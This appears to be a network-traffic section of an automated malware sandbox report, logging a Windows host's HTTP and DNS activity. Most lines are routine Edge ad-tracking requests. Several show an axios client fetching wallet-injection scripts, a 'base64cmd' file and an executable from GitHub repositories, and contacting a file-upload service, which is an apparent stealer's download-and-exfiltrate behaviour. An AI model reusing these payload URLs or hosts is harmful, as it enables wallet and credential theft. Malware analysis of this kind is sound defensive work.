        Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D288DBA3518D2609C3AB7AF8519A96184%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D288DBA3518D2609C3AB7AF8519A96184%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D288DBA3518D2609C3AB7AF8519A96184%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cs/msn?id=254698E11FC6656435158D511ED164B7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cs/msn?id=254698E11FC6656435158D511ED164B7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D288DBA3518D2609C3AB7AF8519A96184%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=288DBA3518D2609C3AB7AF8519A96184&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D288DBA3518D2609C3AB7AF8519A96184%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=288DBA3518D2609C3AB7AF8519A96184&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D288DBA3518D2609C3AB7AF8519A96184%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D288DBA3518D2609C3AB7AF8519A96184%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D288DBA3518D2609C3AB7AF8519A96184%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D288DBA3518D2609C3AB7AF8519A96184%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D288DBA3518D2609C3AB7AF8519A96184%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=288DBA3518D2609C3AB7AF8519A96184&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D288DBA3518D2609C3AB7AF8519A96184%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /REST/v1/Imagery/Map/roadondemandfull/34.860,-84.000/5?mapSize=268,136&shading=terrain&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-us&maxAge=86400&st=me|lv:0_vg|v:0_nh|lv:0_pp|lv:1_cp|v:0_trs|v:1;lv:0;strokeWidthScale:0.2_wt|fc:B3E5FC_cst|v:0&logo=n&da=n&sftr=newweather&userregion=US HTTP/1.1Host: ecn.dev.virtualearth.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&prerender=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; pglt-edgeChromium-ntp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; MicrosoftApplicationsTelemetryDeviceId=d89f1976-d7ca-4e02-b76b-e44b0670b02e; msnup=%7B%22cnex%22%3A%22no%22%7D
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/exodus-inject.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/atomic-main.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/base64cmd HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/badusb/raw/main/extensions.zip HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: github.comConnection: close
        Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Accept: */*accept-language: en-US,en;cache-control: no-cachepragma: no-cacheuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Host: api.gofile.ioConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/badusb/main/extensions.zip HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/vendors.38d37a062dc15af21957.js HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /0x7z1337/gfijfgjgfjfgifgifg/raw/refs/heads/main/ImageG.exe HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: github.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.xnxx.comConnection: close
        Source: global trafficHTTP traffic detected: GET /0x7z1337/gfijfgjgfjfgifgifg/refs/heads/main/ImageG.exe HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 150sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version: "94.0.992.31"Accept: */*downlink: 9.85sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; pglt-edgeChromium-ntp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; MicrosoftApplicationsTelemetryDeviceId=d89f1976-d7ca-4e02-b76b-e44b0670b02e; msnup=%7B%22cnex%22%3A%22no%22%7D; ai_session=B6TiXGWRymNln17HlQ0PSH|1742066834916|1742066834916
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.google.comConnection: close
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: i.imgflip.com
        Source: global trafficDNS traffic detected: DNS query: ipinfo.io
        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: apis.google.com
        Source: global trafficDNS traffic detected: DNS query: api.gofile.io
        Source: global trafficDNS traffic detected: DNS query: store-na-phx-1.gofile.io
        Source: global trafficDNS traffic detected: DNS query: nova-blight.xyz
        Source: global trafficDNS traffic detected: DNS query: thecaca.com
        Source: global trafficDNS traffic detected: DNS query: shopnova.com
        Source: global trafficDNS traffic detected: DNS query: chatfou.com
        Source: global trafficDNS traffic detected: DNS query: novacool.com
        Source: global trafficDNS traffic detected: DNS query: chatbizarre.com
        Source: global trafficDNS traffic detected: DNS query: pandacool.net
        Source: global trafficDNS traffic detected: DNS query: lol.com
        Source: global trafficDNS traffic detected: DNS query: lol.net
        Source: global trafficDNS traffic detected: DNS query: lol.fr
        Source: global trafficDNS traffic detected: DNS query: lol.info
        Source: global trafficDNS traffic detected: DNS query: xnxx.com
        Source: global trafficDNS traffic detected: DNS query: chicagonova.com
        Source: global trafficDNS traffic detected: DNS query: github.com
        Source: global trafficDNS traffic detected: DNS query: www.xnxx.com
        Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
        Source: global trafficTCP traffic: 192.168.11.20:61415 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:61415 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:61415 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:61415 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:53348 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:53348 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:53348 -> 239.255.255.250:1900
        Source: global trafficTCP traffic: 192.168.11.20:53348 -> 239.255.255.250:1900
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-f393f2aX-Version: f393f2aX-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sat, 15 Mar 2025 19:27:01 GMTConnection: closeTransfer-Encoding: chunked
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 15 Mar 2025 19:27:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4511Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sat, 15 Mar 2025 19:27:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FofoO5LkoDrqWwDUyd2OTjULGdzM5E9z2JE6c5v0CqKLr73u5tIm%2BBiFQQiYAveUCY%2F%2FP6oQ%2F15hQJ2%2FJjamACOoT6JCFQMsmHZncQQ4oQ8R1aPqdhhiiVM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 920e67e468a41d72-ATLserver-timing: cfL4;desc="?proto=TCP&rtt=117610&min_rtt=117520&rtt_var=24925&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2800&recv_bytes=5028&delivery_rate=34279&cwnd=252&unsent_bytes=0&cid=98bcb4b2a8e2676c&ts=267&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 15 Mar 2025 19:27:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4511Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sat, 15 Mar 2025 19:27:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFLHN4yEDGN3WbICK0t7wWLmGOvoib%2FqIc79z9W3RHUcSx47WDnTjlDmGnpr7SYLdaFJiZ82rEyz0kPE1Imwh1Y7toVR1Hd7iXB6OUrW9dOq2V2c%2FyWfIk8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 920e67e54b071373-ATLserver-timing: cfL4;desc="?proto=TCP&rtt=117877&min_rtt=117674&rtt_var=25128&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2800&recv_bytes=1497&delivery_rate=34134&cwnd=252&unsent_bytes=0&cid=fe64c25cafaf955f&ts=295&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 15 Mar 2025 19:27:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4511Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sat, 15 Mar 2025 19:27:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJfXHDxZ5Xd4kwlKIqyAHnm4iePnIrZb%2BRuJBC%2Bl3grhheUg6X0by8HKjmWnThsRzFvtyq%2FVAz4kmGGmurGF3rG2WfiXzLgA9ZfwQEGZ4D6o0V8vEy0QjoY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 920e67e54de7ed7f-ATLserver-timing: cfL4;desc="?proto=TCP&rtt=117625&min_rtt=117585&rtt_var=24880&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2801&recv_bytes=1002&delivery_rate=34258&cwnd=252&unsent_bytes=0&cid=706d7f7eea958cf4&ts=292&x=0"
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 15 Mar 2025 19:27:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4511Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Sat, 15 Mar 2025 19:27:16 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5j3HY3WZwOFIqAz%2FWp%2BXRLM05TOFFn2OfP5f0eZ1Bn2ygeq7PL2neIgDu%2FNzEyZZnlTWeBUoXwtsvQifVLcd0ks7mxvG2DMG68%2FQ1N5UhtCnNuB8suvLheE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 920e67e54dc8b02b-ATLserver-timing: 